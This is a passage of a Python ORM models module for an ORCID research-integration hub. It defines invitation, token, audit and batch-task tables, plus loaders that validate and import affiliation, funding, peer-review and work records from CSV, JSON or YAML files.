User, on_delete="SET NULL", null=True, related_name="sent_org_invitations")
org = ForeignKeyField(Organisation, on_delete="SET NULL", verbose_name="Organisation")
email = TextField(help_text="The email address the invitation was sent to.")
token = TextField(unique=True)
confirmed_at = DateTimeField(null=True)
@property
def sent_at(self):
"""Get the time the invitation was sent."""
return self.created_at
class Meta: # noqa: D101,D106
db_table = "org_invitation"
class UserOrg(BaseModel, AuditMixin):
"""Linking object for many-to-many relationship."""
user = ForeignKeyField(User, on_delete="CASCADE", index=True)
org = ForeignKeyField(
Organisation, on_delete="CASCADE", index=True, verbose_name="Organisation")
is_admin = BooleanField(
null=True, default=False, help_text="User is an administrator for the organisation")
# Affiliation bit-map:
affiliations = SmallIntegerField(default=0, null=True, verbose_name="EDU Person Affiliations")
created_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="created_user_orgs")
updated_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="updated_user_orgs")
# TODO: the access token should be either here or in a separate list
# access_token = CharField(max_length=120, unique=True, null=True)
def save(self, *args, **kwargs):
"""Enforce foriegn key contraints and consolidate user roles with the linked organisations.
Enforce foriegn key contraints and consolidate user roles with the linked organisations
before saving data.
"""
if self.is_dirty():
if self.field_is_updated("org"):
self.org # just enforce re-querying
user = self.user
if self.is_admin != user.is_admin:
if self.is_admin or UserOrg.select().where((UserOrg.user_id == self.user_id) & (
UserOrg.org_id != self.org_id) & UserOrg.is_admin).exists(): # noqa: E125
user.roles |= Role.ADMIN
app.logger.info(f"Added ADMIN role to user {user}")
else:
user.roles &= ~Role.ADMIN
app.logger.info(f"Revoked ADMIN role from user {user}")
user.save()
return super().save(*args, **kwargs)
class Meta: # noqa: D101,D106
db_table = "user_org"
table_alias = "uo"
indexes = ((("user", "org"), True), )
class OrcidToken(BaseModel, AuditMixin):
"""For Keeping Orcid token in the table."""
user = ForeignKeyField(User, null=True, index=True) # TODO: add validation for 3-legged authorization tokens
org = ForeignKeyField(Organisation, index=True, verbose_name="Organisation")
    scope = TextField(null=True, db_column="scope")  # TODO: implement property
access_token = CharField(max_length=36, unique=True, null=True)
issue_time = DateTimeField(default=datetime.utcnow)
refresh_token = CharField(max_length=36, unique=True, null=True)
expires_in = IntegerField(default=0)
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
@property
def scopes(self): # noqa: D102
if self.scope:
return self.scope.split(',')
return []
@scopes.setter
def scopes(self, value): # noqa: D102
if isinstance(value, str):
self.scope = value
else:
self.scope = ','.join(value)
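# Illustrative sketch only (not part of the original module): the comma-separated
# "scope" column is exposed as a list via the "scopes" property; the token instance
# is built in memory only, no database needed.
def _example_orcid_token_scopes():
    token = OrcidToken()
    token.scopes = ["/read-limited", "/activities/update"]
    assert token.scope == "/read-limited,/activities/update"
    assert token.scopes == ["/read-limited", "/activities/update"]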
class UserOrgAffiliation(BaseModel, AuditMixin):
"""For Keeping the information about the affiliation."""
user = ForeignKeyField(User)
organisation = ForeignKeyField(Organisation, index=True, verbose_name="Organisation")
disambiguated_id = CharField(verbose_name="Disambiguation ORG Id", null=True)
disambiguation_source = CharField(verbose_name="Disambiguation ORG Source", null=True)
name = TextField(null=True, verbose_name="Institution/employer")
start_date = PartialDateField(null=True)
end_date = PartialDateField(null=True)
department_name = TextField(null=True)
department_city = TextField(null=True)
role_title = TextField(null=True)
put_code = IntegerField(null=True)
path = TextField(null=True)
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
class Meta: # noqa: D101,D106
db_table = "user_organisation_affiliation"
table_alias = "oua"
class OrcidApiCall(BaseModel):
"""ORCID API call audit entry."""
called_at = DateTimeField(default=datetime.utcnow)
user = ForeignKeyField(User, null=True)
method = TextField()
url = TextField()
query_params = TextField(null=True)
body = TextField(null=True)
put_code = IntegerField(null=True)
response = TextField(null=True)
response_time_ms = IntegerField(null=True)
class Meta: # noqa: D101,D106
db_table = "orcid_api_call"
class OrcidAuthorizeCall(BaseModel):
"""ORCID Authorize call audit entry."""
called_at = DateTimeField(default=datetime.utcnow)
user = ForeignKeyField(User, null=True)
method = TextField(null=True)
url = TextField(null=True)
token = TextField(null=True)
state = TextField(null=True)
response_time_ms = IntegerField(null=True)
class Meta: # noqa: D101,D106
db_table = "orcid_authorize_call"
class Task(BaseModel, AuditMixin):
"""Batch processing task created form CSV/TSV file."""
org = ForeignKeyField(
Organisation, index=True, verbose_name="Organisation", on_delete="SET NULL")
completed_at = DateTimeField(null=True)
filename = TextField(null=True)
created_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="created_tasks")
updated_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="updated_tasks")
task_type = SmallIntegerField(default=0)
expires_at = DateTimeField(null=True)
expiry_email_sent_at = DateTimeField(null=True)
def __repr__(self):
return self.filename or f"{TaskType(self.task_type).name.capitalize()} record processing task #{self.id}"
@property
def is_expiry_email_sent(self):
"""Test if the expiry email is sent ot not."""
return bool(self.expiry_email_sent_at)
@lazy_property
def record_count(self):
"""Get count of the loaded recoreds."""
return self.records.count()
@property
def record_model(self):
"""Get record model class."""
_, models = self.records.get_query_meta()
model, = models.keys()
return model
@lazy_property
def records(self):
"""Get all task record query."""
return getattr(self, TaskType(self.task_type).name.lower() + "_records")
@property
def error_count(self):
"""Get error count encountered during processing batch task."""
q = self.records
_, models = q.get_query_meta()
model, = models.keys()
return self.records.where(self.record_model.status ** "%error%").count()
@classmethod
def load_from_csv(cls, source, filename=None, org=None):
"""Load affiliation record data from CSV/TSV file or a string."""
if isinstance(source, str):
source = StringIO(source)
reader = csv.reader(source)
header = next(reader)
if filename is None:
if hasattr(source, "name"):
filename = source.name
else:
filename = datetime.utcnow().isoformat(timespec="seconds")
if len(header) == 1 and '\t' in header[0]:
source.seek(0)
reader = csv.reader(source, delimiter='\t')
header = next(reader)
if len(header) < 2:
raise ModelException("Expected CSV or TSV format file.")
assert len(header) >= 7, \
"Wrong number of fields. Expected at least 7 fields " \
"(first name, last name, email address, organisation, " \
"campus/department, city, course or job title, start date, end date, student/staff). " \
f"Read header: {header}"
header_rexs = [
re.compile(ex, re.I)
for ex in (r"first\s*(name)?", r"last\s*(name)?", "email", "organisation|^name",
"campus|department", "city", "state|region", "course|title|role",
r"start\s*(date)?", r"end\s*(date)?",
r"affiliation(s)?\s*(type)?|student|staff", "country", r"disambiguat.*id",
r"disambiguat.*source", r"put|code", "orcid.*", "external.*|.*identifier")
]
def index(rex):
"""Return first header column index matching the given regex."""
for i, column in enumerate(header):
if rex.match(column):
return i
else:
return None
idxs = [index(rex) for rex in header_rexs]
if all(idx is None for idx in idxs):
raise ModelException(f"Failed to map fields based on the header of the file: {header}")
if org is None:
org = current_user.organisation if current_user else None
def val(row, i, default=None):
if idxs[i] is None or idxs[i] >= len(row):
return default
else:
v = row[idxs[i]].strip()
return default if v == '' else v
with db.atomic():
try:
task = cls.create(org=org, filename=filename)
for row_no, row in enumerate(reader):
# skip empty lines:
if len(row) == 0:
continue
if len(row) == 1 and row[0].strip() == '':
continue
email = val(row, 2, "").lower()
orcid = val(row, 15)
external_id = val(row, 16)
if not email and not orcid and external_id and validators.email(external_id):
                    # if email is missing and the external ID is given as a valid email, use it:
email = external_id
# The uploaded country must be from ISO 3166-1 alpha-2
country = val(row, 11)
if country:
try:
country = countries.lookup(country).alpha_2
except Exception:
raise ModelException(
f" (Country must be 2 character from ISO 3166-1 alpha-2) in the row "
f"#{row_no+2}: {row}. Header: {header}")
if not (email or orcid):
raise ModelException(
f"Missing user identifier (email address or ORCID iD) in the row "
f"#{row_no+2}: {row}. Header: {header}")
if orcid:
validate_orcid_id(orcid)
if not email or not validators.email(email):
raise ValueError(
f"Invalid email address '{email}' in the row #{row_no+2}: {row}")
affiliation_type = val(row, 10, "").lower()
if not affiliation_type or affiliation_type not in AFFILIATION_TYPES:
raise ValueError(
f"Invalid affiliation type '{affiliation_type}' in the row #{row_no+2}: {row}. "
f"Expected values: {', '.join(at for at in AFFILIATION_TYPES)}.")
af = AffiliationRecord(
task=task,
first_name=val(row, 0),
last_name=val(row, 1),
email=email,
organisation=val(row, 3),
department=val(row, 4),
city=val(row, 5),
region=val(row, 6),
role=val(row, 7),
start_date=PartialDate.create(val(row, 8)),
end_date=PartialDate.create(val(row, 9)),
affiliation_type=affiliation_type,
country=country,
disambiguated_id=val(row, 12),
disambiguation_source=val(row, 13),
put_code=val(row, 14),
orcid=orcid,
external_id=external_id)
validator = ModelValidator(af)
if not validator.validate():
raise ModelException(f"Invalid record: {validator.errors}")
af.save()
except Exception:
db.rollback()
app.logger.exception("Failed to load affiliation file.")
raise
return task
class Meta: # noqa: D101,D106
table_alias = "t"
class UserInvitation(BaseModel, AuditMixin):
"""Organisation invitation to on-board the Hub."""
invitee = ForeignKeyField(
User, on_delete="CASCADE", null=True, related_name="received_user_invitations")
inviter = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="sent_user_invitations")
org = ForeignKeyField(
Organisation, on_delete="CASCADE", null=True, verbose_name="Organisation")
task = ForeignKeyField(Task, on_delete="CASCADE", null=True, index=True, verbose_name="Task")
email = CharField(
index=True, max_length=80, help_text="The email address the invitation was sent to.")
first_name = TextField(null=True, verbose_name="First Name")
last_name = TextField(null=True, verbose_name="Last Name")
orcid = OrcidIdField(null=True)
department = TextField(verbose_name="Campus/Department", null=True)
organisation = TextField(verbose_name="Organisation Name", null=True)
city = TextField(verbose_name="City", null=True)
state = TextField(verbose_name="State", null=True)
country = CharField(verbose_name="Country", max_length=2, null=True)
course_or_role = TextField(verbose_name="Course or Job title", null=True)
start_date = PartialDateField(verbose_name="Start date", null=True)
end_date = PartialDateField(verbose_name="End date (leave blank if current)", null=True)
affiliations = SmallIntegerField(verbose_name="User affiliations", null=True)
disambiguated_id = TextField(verbose_name="Disambiguation ORG Id", null=True)
disambiguation_source = TextField(verbose_name="Disambiguation ORG Source", null=True)
token = TextField(unique=True)
confirmed_at = DateTimeField(null=True)
@property
def sent_at(self):
"""Get the time the invitation was sent."""
return self.created_at
class Meta: # noqa: D101,D106
db_table = "user_invitation"
class RecordModel(BaseModel):
"""Commond model bits of the task records."""
def save(self, *args, **kwargs):
"""Update related batch task when changing the record."""
if self.is_dirty() and hasattr(self, "task"):
self.task.updated_at = datetime.utcnow()
self.task.save()
return super().save(*args, **kwargs)
def add_status_line(self, line):
"""Add a text line to the status for logging processing progress."""
ts = datetime.utcnow().isoformat(timespec="seconds")
self.status = (self.status + "\n" if self.status else '') + ts + ": " + line
class GroupIdRecord(RecordModel):
"""GroupID records."""
type_choices = [('publisher', 'publisher'), ('institution', 'institution'), ('journal', 'journal'),
('conference', 'conference'), ('newspaper', 'newspaper'), ('newsletter', 'newsletter'),
('magazine', 'magazine'), ('peer-review service', 'peer-review service')]
type_choices.sort(key=lambda e: e[1])
type_choices.insert(0, ("", ""))
put_code = IntegerField(null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
name = CharField(max_length=120,
help_text="The name of the group. This can be the name of a journal (Journal of Criminal Justice),"
" a publisher (Society of Criminal Justice), or non-specific description (Legal Journal)"
" as required.")
group_id = CharField(max_length=120,
help_text="The group's identifier, formatted as type:identifier, e.g. issn:12345678. "
"This can be as specific (e.g. the journal's ISSN) or vague as required. "
"Valid types include: issn, ringgold, orcid-generated, fundref, publons.")
description = CharField(max_length=120,
help_text="A brief textual description of the group. "
"This can be as specific or vague as required.")
type = CharField(max_length=80, choices=type_choices,
help_text="One of the specified types: publisher; institution; journal; conference; newspaper; "
"newsletter; magazine; peer-review service.")
organisation = ForeignKeyField(
Organisation, related_name="organisation", on_delete="CASCADE", null=True)
class Meta: # noqa: D101,D106
db_table = "group_id_record"
table_alias = "gid"
class AffiliationRecord(RecordModel):
"""Affiliation record loaded from CSV file for batch processing."""
is_active = BooleanField(
default=False, help_text="The record is marked 'active' for batch processing", null=True)
task = ForeignKeyField(Task, related_name="affiliation_records", on_delete="CASCADE")
put_code = IntegerField(null=True)
external_id = CharField(
max_length=100,
null=True,
verbose_name="External ID",
help_text="Record identifier used in the data source system.")
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
first_name = CharField(max_length=120, null=True)
last_name = CharField(max_length=120, null=True)
email = CharField(max_length=80, null=True)
orcid = OrcidIdField(null=True)
organisation = CharField(null=True, index=True, max_length=200)
affiliation_type = CharField(
max_length=20, null=True, choices=[(v, v) for v in AFFILIATION_TYPES])
role = CharField(null=True, verbose_name="Role/Course", max_length=100)
department = CharField(null=True, max_length=200)
start_date = PartialDateField(null=True)
end_date = PartialDateField(null=True)
city = CharField(null=True, max_length=200)
state = CharField(null=True, verbose_name="State/Region", max_length=100)
country = CharField(null=True, verbose_name="Country", max_length=2)
disambiguated_id = CharField(
null=True, max_length=20, verbose_name="Disambiguated Organization Identifier")
disambiguation_source = CharField(
null=True, max_length=100, verbose_name="Disambiguation Source")
class Meta: # noqa: D101,D106
db_table = "affiliation_record"
table_alias = "ar"
class TaskType(IntFlag):
"""Enum used to represent Task type."""
    AFFILIATION = 0  # Affiliation of employment/education
FUNDING = 1 # Funding
WORK = 2
PEER_REVIEW = 3
def __eq__(self, other):
if isinstance(other, TaskType):
return self.value == other.value
elif isinstance(other, int):
return self.value == other
return (self.name == other or self.name == getattr(other, "name", None))
def __hash__(self):
return hash(self.name)
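# Illustrative sketch only (not part of the original module): the loose __eq__ lets
# TaskType compare against ints and names alike, and Task.records uses the lower-cased
# name to pick the related record set.
def _example_task_type():
    assert TaskType.FUNDING == 1 and TaskType.FUNDING == "FUNDING"
    assert TaskType(2).name.lower() + "_records" == "work_records"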
class FundingRecord(RecordModel):
"""Funding record loaded from Json file for batch processing."""
task = ForeignKeyField(Task, related_name="funding_records", on_delete="CASCADE")
title = CharField(max_length=255)
translated_title = CharField(null=True, max_length=255)
translated_title_language_code = CharField(null=True, max_length=10)
type = CharField(max_length=255)
organization_defined_type = CharField(null=True, max_length=255)
short_description = CharField(null=True, max_length=4000)
amount = CharField(null=True, max_length=255)
currency = CharField(null=True, max_length=3)
start_date = PartialDateField(null=True)
end_date = PartialDateField(null=True)
org_name = CharField(null=True, max_length=255, verbose_name="Organisation Name")
city = CharField(null=True, max_length=255)
region = CharField(null=True, max_length=255)
country = CharField(null=True, max_length=255)
disambiguated_org_identifier = CharField(null=True, max_length=255)
disambiguation_source = CharField(null=True, max_length=255)
is_active = BooleanField(
default=False, help_text="The record is marked for batch processing", null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
@classmethod
def load_from_json(cls, source, filename=None, org=None):
"""Load data from json file or a string."""
if isinstance(source, str):
# import data from file based on its extension; either it is yaml or json
funding_data_list = load_yaml_json(filename=filename, source=source)
for funding_data in funding_data_list:
validation_source_data = copy.deepcopy(funding_data)
validation_source_data = del_none(validation_source_data)
                # Add schema validation for funding
validator = Core(
source_data=validation_source_data, schema_files=["funding_schema.yaml"])
validator.validate(raise_exception=True)
try:
if org is None:
org = current_user.organisation if current_user else None
task = Task.create(org=org, filename=filename, task_type=TaskType.FUNDING)
for funding_data in funding_data_list:
title = get_val(funding_data, "title", "title", "value")
translated_title = get_val(funding_data, "title", "translated-title", "value")
translated_title_language_code = get_val(funding_data, "title", "translated-title", "language-code")
type = funding_data.get("type")
organization_defined_type = get_val(funding_data, "organization-defined-type", "value")
short_description = funding_data.get("short-description")
amount = get_val(funding_data, "amount", "value")
currency = get_val(funding_data, "amount", "currency-code")
start_date = PartialDate.create(funding_data.get("start-date"))
end_date = PartialDate.create(funding_data.get("end-date"))
org_name = get_val(funding_data, "organization", "name")
city = get_val(funding_data, "organization", "address", "city")
region = get_val(funding_data, "organization", "address", "region")
country = get_val(funding_data, "organization", "address", "country")
disambiguated_org_identifier = get_val(funding_data, "organization", "disambiguated-organization",
"disambiguated-organization-identifier")
disambiguation_source = get_val(funding_data, "organization", "disambiguated-organization",
"disambiguation-source")
funding_record = FundingRecord.create(
task=task,
title=title,
translated_title=translated_title,
translated_title_language_code=translated_title_language_code,
type=type,
organization_defined_type=organization_defined_type,
short_description=short_description,
amount=amount,
currency=currency,
org_name=org_name,
city=city,
region=region,
country=country,
disambiguated_org_identifier=disambiguated_org_identifier,
disambiguation_source=disambiguation_source,
start_date=start_date,
end_date=end_date)
invitees_list = funding_data.get("invitees") if funding_data.get("invitees") else None
if invitees_list:
for invitee in invitees_list:
identifier = invitee.get("identifier")
email = invitee.get("email")
first_name = invitee.get("first-name")
last_name = invitee.get("last-name")
orcid_id = invitee.get("ORCID-iD")
put_code = invitee.get("put-code")
visibility = invitee.get("visibility")
FundingInvitees.create(
funding_record=funding_record,
identifier=identifier,
email=email.lower(),
first_name=first_name,
last_name=last_name,
orcid=orcid_id,
visibility=visibility,
put_code=put_code)
else:
raise SchemaError(u"Schema validation failed:\n - "
u"Expecting Invitees for which the funding record will be written")
contributors_list = funding_data.get("contributors").get("contributor") if \
funding_data.get("contributors") else None
if contributors_list:
for contributor in contributors_list:
orcid_id = get_val(contributor, "contributor-orcid", "path")
name = get_val(contributor, "credit-name", "value")
email = get_val(contributor, "contributor-email", "value")
role = get_val(contributor, "contributor-attributes", "contributor-role")
FundingContributor.create(
funding_record=funding_record,
orcid=orcid_id,
name=name,
email=email,
role=role)
external_ids_list = funding_data.get("external-ids").get("external-id") if \
funding_data.get("external-ids") else None
if external_ids_list:
for external_id in external_ids_list:
type = external_id.get("external-id-type")
value = external_id.get("external-id-value")
url = get_val(external_id, "external-id-url", "value")
relationship = external_id.get("external-id-relationship")
ExternalId.create(
funding_record=funding_record,
type=type,
value=value,
url=url,
relationship=relationship)
else:
raise SchemaError(u"Schema validation failed:\n - An external identifier is required")
return task
except Exception:
db.rollback()
app.logger.exception("Failed to load funding file.")
raise
class Meta: # noqa: D101,D106
db_table = "funding_record"
table_alias = "fr"
class PeerReviewRecord(RecordModel):
"""Peer Review record loaded from Json file for batch processing."""
task = ForeignKeyField(Task, related_name="peer_review_records", on_delete="CASCADE")
review_group_id = CharField(max_length=255)
reviewer_role = CharField(null=True, max_length=255)
review_url = CharField(null=True, max_length=255)
review_type = CharField(null=True, max_length=255)
review_completion_date = PartialDateField(null=True)
subject_external_id_type = CharField(null=True, max_length=255)
subject_external_id_value = CharField(null=True, max_length=255)
subject_external_id_url = CharField(null=True, max_length=255)
subject_external_id_relationship = CharField(null=True, max_length=255)
subject_container_name = CharField(null=True, max_length=255)
subject_type = CharField(null=True, max_length=80)
subject_name_title = CharField(null=True, max_length=255)
subject_name_subtitle = CharField(null=True, max_length=255)
subject_name_translated_title_lang_code = CharField(null=True, max_length=10)
subject_name_translated_title = CharField(null=True, max_length=255)
subject_url = CharField(null=True, max_length=255)
convening_org_name = CharField(null=True, max_length=255)
convening_org_city = CharField(null=True, max_length=255)
convening_org_region = CharField(null=True, max_length=255)
convening_org_country = CharField(null=True, max_length=255)
convening_org_disambiguated_identifier = CharField(null=True, max_length=255)
convening_org_disambiguation_source = CharField(null=True, max_length=255)
is_active = BooleanField(
default=False, help_text="The record is marked for batch processing", null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
@classmethod
def load_from_json(cls, source, filename=None, org=None):
"""Load data from JSON file or a string."""
if isinstance(source, str):
# import data from file based on its extension; either it is yaml or json
peer_review_data_list = load_yaml_json(filename=filename, source=source)
for peer_review_data in peer_review_data_list:
validation_source_data = copy.deepcopy(peer_review_data)
validation_source_data = del_none(validation_source_data)
validator = Core(source_data=validation_source_data, schema_files=["peer_review_schema.yaml"])
validator.validate(raise_exception=True)
try:
if org is None:
org = current_user.organisation if current_user else None
task = Task.create(org=org, filename=filename, task_type=TaskType.PEER_REVIEW)
for peer_review_data in peer_review_data_list:
review_group_id = peer_review_data.get("review-group-id") if peer_review_data.get(
"review-group-id") else None
reviewer_role = peer_review_data.get("reviewer-role") if peer_review_data.get(
"reviewer-role") else None
review_url = peer_review_data.get("review-url").get("value") if peer_review_data.get(
"review-url") else None
review_type = peer_review_data.get("review-type") if peer_review_data.get("review-type") else None
review_completion_date = PartialDate.create(peer_review_data.get("review-completion-date"))
subject_external_id_type = peer_review_data.get("subject-external-identifier").get(
"external-id-type") if peer_review_data.get(
"subject-external-identifier") else None
subject_external_id_value = peer_review_data.get("subject-external-identifier").get(
"external-id-value") if peer_review_data.get(
"subject-external-identifier") else None
subject_external_id_url = peer_review_data.get("subject-external-identifier").get(
"external-id-url").get("value") if peer_review_data.get(
"subject-external-identifier") and peer_review_data.get("subject-external-identifier").get(
"external-id-url") else None
subject_external_id_relationship = peer_review_data.get("subject-external-identifier").get(
"external-id-relationship") if peer_review_data.get(
"subject-external-identifier") else None
subject_container_name = peer_review_data.get("subject-container-name").get(
"value") if peer_review_data.get(
"subject-container-name") else None
subject_type = peer_review_data.get("subject-type") if peer_review_data.get(
"subject-type") else None
subject_name_title = peer_review_data.get("subject-name").get("title").get(
"value") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("title") else None
subject_name_subtitle = peer_review_data.get("subject-name").get("subtitle").get(
"value") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("subtitle") else None
subject_name_translated_title_lang_code = peer_review_data.get("subject-name").get(
"translated-title").get(
"language-code") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("translated-title") else None
subject_name_translated_title = peer_review_data.get("subject-name").get(
"translated-title").get(
"value") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("translated-title") else None
subject_url = peer_review_data.get("subject-url").get("value") if peer_review_data.get(
"subject-name") else None
convening_org_name = peer_review_data.get("convening-organization").get(
"name") if peer_review_data.get(
"convening-organization") else None
convening_org_city = peer_review_data.get("convening-organization").get("address").get(
"city") if peer_review_data.get("convening-organization") and peer_review_data.get(
"convening-organization").get("address") else None
convening_org_region = peer_review_data.get("convening-organization").get("address").get(
"region") if peer_review_data.get("convening-organization") and peer_review_data.get(
"convening-organization").get("address") else None
convening_org_country = peer_review_data.get("convening-organization").get("address").get(
"country") if peer_review_data.get("convening-organization") and peer_review_data.get(
"convening-organization").get("address") else None
convening_org_disambiguated_identifier = peer_review_data.get(
"convening-organization").get("disambiguated-organization").get(
"disambiguated-organization-identifier") if peer_review_data.get(
"convening-organization") and peer_review_data.get("convening-organization").get(
"disambiguated-organization") else None
convening_org_disambiguation_source = peer_review_data.get(
"convening-organization").get("disambiguated-organization").get(
"disambiguation-source") if peer_review_data.get(
"convening-organization") and peer_review_data.get("convening-organization").get(
"disambiguated-organization") else None
peer_review_record = PeerReviewRecord.create(
task=task,
review_group_id=review_group_id,
reviewer_role=reviewer_role,
review_url=review_url,
review_type=review_type,
review_completion_date=review_completion_date,
subject_external_id_type=subject_external_id_type,
subject_external_id_value=subject_external_id_value,
subject_external_id_url=subject_external_id_url,
subject_external_id_relationship=subject_external_id_relationship,
subject_container_name=subject_container_name,
subject_type=subject_type,
subject_name_title=subject_name_title,
subject_name_subtitle=subject_name_subtitle,
subject_name_translated_title_lang_code=subject_name_translated_title_lang_code,
subject_name_translated_title=subject_name_translated_title,
subject_url=subject_url,
convening_org_name=convening_org_name,
convening_org_city=convening_org_city,
convening_org_region=convening_org_region,
convening_org_country=convening_org_country,
convening_org_disambiguated_identifier=convening_org_disambiguated_identifier,
convening_org_disambiguation_source=convening_org_disambiguation_source)
invitees_list = peer_review_data.get("invitees") if peer_review_data.get("invitees") else None
if invitees_list:
for invitee in invitees_list:
identifier = invitee.get("identifier") if invitee.get("identifier") else None
email = invitee.get("email") if invitee.get("email") else None
first_name = invitee.get("first-name") if invitee.get("first-name") else None
last_name = invitee.get("last-name") if invitee.get("last-name") else None
orcid_id = invitee.get("ORCID-iD") if invitee.get("ORCID-iD") else None
put_code = invitee.get("put-code") if invitee.get("put-code") else None
visibility = get_val(invitee, "visibility")
PeerReviewInvitee.create(
peer_review_record=peer_review_record,
identifier=identifier,
email=email.lower(),
first_name=first_name,
last_name=last_name,
orcid=orcid_id,
visibility=visibility,
put_code=put_code)
else:
raise SchemaError(u"Schema validation failed:\n - "
u"Expecting Invitees for which the peer review record will be written")
external_ids_list = peer_review_data.get("review-identifiers").get("external-id") if \
peer_review_data.get("review-identifiers") else None
if external_ids_list:
for external_id in external_ids_list:
type = external_id.get("external-id-type")
value = external_id.get("external-id-value")
url = external_id.get("external-id-url").get("value") if \
external_id.get("external-id-url") else None
relationship = external_id.get("external-id-relationship")
PeerReviewExternalId.create(
peer_review_record=peer_review_record,
type=type,
value=value,
url=url,
relationship=relationship)
else:
raise SchemaError(u"Schema validation failed:\n - An external identifier is required")
return task
except Exception:
db.rollback()
app.logger.exception("Failed to load peer review file.")
raise
class Meta: # noqa: D101,D106
db_table = "peer_review_record"
table_alias = "pr"
class WorkRecord(RecordModel):
"""Work record loaded from Json file for batch processing."""
task = ForeignKeyField(Task, related_name="work_records", on_delete="CASCADE")
title = CharField(max_length=255)
sub_title = CharField(null=True, max_length=255)
translated_title = CharField(null=True, max_length=255)
translated_title_language_code = CharField(null=True, max_length=10)
journal_title = CharField(null=True, max_length=255)
short_description = CharField(null=True, max_length=4000)
citation_type = CharField(max_length=255)
citation_value = CharField(max_length=255)
type = CharField(null=True, max_length=255)
publication_date = PartialDateField(null=True)
publication_media_type = CharField(null=True, max_length=255)
url = CharField(null=True, max_length=255)
language_code = CharField(null=True, max_length=10)
country = CharField(null=True, max_length=255)
is_active = BooleanField(
default=False, help_text="The record is marked for batch processing", null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
@classmethod
def load_from_json(cls, source, filename=None, org=None):
"""Load data from JSON file or a string."""
if isinstance(source, str):
# import data from file based on its extension; either it is yaml or json
work_data_list = load_yaml_json(filename=filename, source=source)
# TODO: validation of uploaded work file
for work_data in work_data_list:
validation_source_data = copy.deepcopy(work_data)
validation_source_data = del_none(validation_source_data)
# Schema validation for the uploaded work records
validator = Core(
source_data=validation_source_data, schema_files=["work_schema.yaml"])
validator.validate(raise_exception=True)
try:
if org is None:
org = current_user.organisation if current_user else None
task = Task.create(org=org, filename=filename, task_type=TaskType.WORK)
for work_data in work_data_list:
title = get_val(work_data, "title", "title", "value")
sub_title = get_val(work_data, "title", "subtitle", "value")
translated_title = get_val(work_data, "title", "translated-title", "value")
translated_title_language_code = get_val(work_data, "title", "translated-title", "language-code")
journal_title = get_val(work_data, "journal-title", "value")
short_description = get_val(work_data, "short-description")
citation_type = get_val(work_data, "citation", "citation-type")
citation_value = get_val(work_data, "citation", "citation-value")
type = get_val(work_data, "type")
publication_media_type = get_val(work_data, "publication-date", "media-type")
url = get_val(work_data, "url", "value")
language_code = get_val(work_data, "language-code")
country = get_val(work_data, "country", "value")
# Drop 'media-type' from the publication-date dict; only year, month and day are used for the partial date.
publication_date = PartialDate.create(
{date_key: work_data.get("publication-date")[date_key] for date_key in
('day', 'month', 'year')}) if work_data.get("publication-date") else None
work_record = WorkRecord.create(
task=task,
title=title,
sub_title=sub_title,
translated_title=translated_title,
translated_title_language_code=translated_title_language_code,
journal_title=journal_title,
short_description=short_description,
citation_type=citation_type,
citation_value=citation_value,
type=type,
publication_date=publication_date,
publication_media_type=publication_media_type,
url=url,
language_code=language_code,
country=country)
invitees_list = work_data.get("invitees") if work_data.get("invitees") else None
if invitees_list:
for invitee in invitees_list:
identifier = invitee.get("identifier")
email = invitee.get("email")
first_name = invitee.get("first-name")
last_name = invitee.get("last-name")
orcid_id = invitee.get("ORCID-iD")
put_code = invitee.get("put-code")
visibility = get_val(invitee, "visibility")
WorkInvitees.create(
work_record=work_record,
identifier=identifier,
email=email.lower(),
first_name=first_name,
last_name=last_name,
orcid=orcid_id,
visibility=visibility,
put_code=put_code)
else:
raise SchemaError(u"Schema validation failed:\n - "
u"Expecting Invitees for which the work record will be written")
contributors_list = work_data.get("contributors").get("contributor") if \
work_data.get("contributors") else None
if contributors_list:
for contributor in contributors_list:
orcid_id = get_val(contributor, "contributor-orcid", "path")
name = get_val(contributor, "credit-name", "value")
email = get_val(contributor, "contributor-email", "value")
role = get_val(contributor, "contributor-attributes", "contributor-role")
contributor_sequence = get_val(contributor, "contributor-attributes",
"contributor-sequence")
WorkContributor.create(
work_record=work_record,
orcid=orcid_id,
name=name,
email=email,
role=role,
contributor_sequence=contributor_sequence)
external_ids_list = work_data.get("external-ids").get("external-id") if \
work_data.get("external-ids") else None
if external_ids_list:
for external_id in external_ids_list:
type = external_id.get("external-id-type")
value = external_id.get("external-id-value")
url = get_val(external_id, "external-id-url", "value")
relationship = external_id.get("external-id-relationship")
WorkExternalId.create(
work_record=work_record,
type=type,
value=value,
url=url,
relationship=relationship)
else:
raise SchemaError(u"Schema validation failed:\n - An external identifier is required")
return task
except Exception:
db.rollback()
app.logger.exception("Failed to load work record file.")
raise
class Meta: # noqa: D101,D106
db_table = "work_record"
table_alias = "wr"
class ContributorModel(BaseModel):
"""Common model bits of the contributor records."""
orcid = OrcidIdField(null=True)
name = CharField(max_length=120, null=True)
role = CharField(max_length=120, null=True)
email = CharField(max_length=120, null=True)
class WorkContributor(ContributorModel):
"""Researcher or contributor - related to work."""
work_record = ForeignKeyField(
WorkRecord, related_name="work_contributors", on_delete="CASCADE")
contributor_sequence = CharField(max_length=120, null=True)
class Meta: # noqa: D101,D106
db_table = "work_contributor"
table_alias = "wc"
class FundingContributor(ContributorModel):
"""Researcher or contributor - reciever of the funding."""
funding_record = ForeignKeyField(
FundingRecord, related_name="contributors", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "funding_contributor"
table_alias = "fc"
class InviteesModel(BaseModel):
